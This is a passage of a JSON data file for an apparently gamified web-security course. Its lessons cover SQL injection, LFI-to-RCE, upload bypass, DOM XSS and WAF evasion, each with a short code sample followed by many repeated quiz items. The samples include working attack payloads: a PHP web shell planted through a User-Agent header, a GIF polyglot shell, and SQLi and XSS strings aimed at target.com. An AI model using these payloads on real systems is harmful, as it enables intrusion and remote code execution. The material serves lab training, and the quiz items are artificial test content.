wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-type-juggling","cat":"Web Application","title":"PHP Type Juggling","diff":2,"xp":150,"intro":"Exploit loose comparison for auth bypass.","sections":[{"type":"text","content":"PHP == treats '0e123' == '0e456' as true (both are 0 in scientific notation)."},{"type":"code","lang":"php","content":"// '0e462097431906509019562988736854' == '0' is TRUE\n// MD5('240610708') = 0e462097...\n// Fix: use === instead of =="},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Type juggling exploits...","opts":["Buffer overflows","Loose comparison treating different values as equal","SQL injection","XSS"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-sqli-blind-bool","cat":"Web Application","title":"Blind Boolean SQLi","diff":2,"xp":150,"intro":"Extract data bit by bit from page differences.","sections":[{"type":"text","content":"When no errors shown, use true/false conditions and compare responses."},{"type":"code","lang":"bash","content":"?id=1 AND 1=1--  # true: normal page\n?id=1 AND 1=2--  # false: different page\n?id=1 AND SUBSTRING(@@version,1,1)='5'--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Boolean blind SQLi works by...","opts":["Error messages","Comparing responses for true vs false conditions","Timing","Direct output"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-lfi-rce","cat":"Web Application","title":"LFI to RCE","diff":3,"xp":200,"intro":"Turn file inclusion into code execution.","sections":[{"type":"text","content":"Inject PHP into logs, then include the log file through LFI."},{"type":"code","lang":"bash","content":"# Inject PHP via User-Agent\ncurl -A '<?php system($_GET[\"cmd\"]); ?>' http://target.com/\n# Include the log\ncurl 'http://target.com/?file=/var/log/apache2/access.log&cmd=id'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Log poisoning turns LFI into RCE by...","opts":["Encrypting logs","Injecting executable code into a log file then including it","Deleting logs","Modifying config"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-sqli-time","cat":"Web Application","title":"Time-Based Blind SQLi","diff":3,"xp":200,"intro":"Use time delays when responses look identical.","sections":[{"type":"text","content":"Inject conditional delays: 5s response = true, instant = false."},{"type":"code","lang":"bash","content":"?id=1 AND IF(1=1,SLEEP(5),0)--\n?id=1 AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Time-based SQLi uses...","opts":["Error messages","Conditional time delays","Page content","Status codes"],"ans":1},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-sqli-second","cat":"Web Application","title":"Second-Order SQLi","diff":3,"xp":250,"intro":"Inject now, trigger later in a different function.","sections":[{"type":"text","content":"Payload stored during registration triggers when another function uses it unsanitized."},{"type":"code","lang":"bash","content":"# Register with: admin'--\n# Later query: SELECT * FROM users WHERE user='admin'--'\n# Comment removes password check"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Second-order SQLi is hard to find because...","opts":["It uses encryption","Injection and trigger happen in different requests","It requires admin","It only works on MySQL"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-upload-advanced","cat":"Web Application","title":"Advanced File Upload Bypass","diff":3,"xp":200,"intro":"Bypass multiple upload validation layers.","sections":[{"type":"text","content":"Double extensions, null bytes, Content-Type spoofing, magic bytes, polyglots."},{"type":"code","lang":"bash","content":"shell.pHp  shell.php.jpg  shell.php%00.jpg\ncurl -F 'file=@shell.php;type=image/jpeg' target.com/upload\necho -e 'GIF89a\\n<?php system($_GET[\"cmd\"]); ?>' > shell.gif"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"A polyglot file is...","opts":["Compressed","Valid in multiple formats simultaneously","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-dom-xss","cat":"Web Application","title":"DOM-Based XSS","diff":3,"xp":200,"intro":"Client-side JavaScript processes tainted input.","sections":[{"type":"text","content":"Source (location.hash) flows to sink (innerHTML) entirely in the browser."},{"type":"code","lang":"javascript","content":"// http://target.com/#<img src=x onerror=alert(1)>\ndocument.getElementById('output').innerHTML = location.hash.slice(1);"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"DOM XSS is different because...","opts":["It's server-side","Payload never reaches the server","It uses SQL","It's encrypted"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-waf-bypass","cat":"Web Application","title":"WAF Bypass Techniques","diff":4,"xp":250,"intro":"Get payloads past Web Application Firewalls.","sections":[{"type":"text","content":"Encoding, case variation, comments, and alternative syntax bypass WAF rules."},{"type":"code","lang":"bash","content":"<ScRiPt>alert(1)</ScRiPt>\n<svg/onload=alert(1)>\n1'/*!UNION*//*!SELECT*/1,2,3--\n%2527 (double URL encode)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"WAFs are bypassed by...","opts":["Stronger encryption","Encoding and alternative syntax","Faster requests","Different protocols"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting 